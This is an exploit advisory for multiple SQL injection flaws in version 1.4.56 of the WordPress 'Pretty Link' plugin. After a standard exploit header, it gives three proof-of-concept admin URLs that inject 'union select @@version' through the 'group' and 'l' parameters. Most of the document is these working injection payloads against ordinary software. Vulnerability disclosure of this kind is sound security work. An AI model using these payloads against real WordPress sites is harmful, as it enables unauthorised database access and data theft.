The WordPress Pretty Link Like plugin version 1.4.56 suffers from multiple remote SQL injection vulnerabilities.
97a3bb6476b9caa1814665fb8ab0ef26f2534c995e339068c8524bc9fd02813e
# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL
Injection
# Google Dork: N/A
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin)
# Date: 27/06/2011
# Software Link: http://wordpress.org/extend/plugins/pretty-link/
# Version: 1.4.56 (not tested on previous versions)
# Tested on: WhatEver OS
# CVE : 0-Day
PoC 1 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
select @@version
PoC 2 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
select @@version
PoC 3 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
select @@version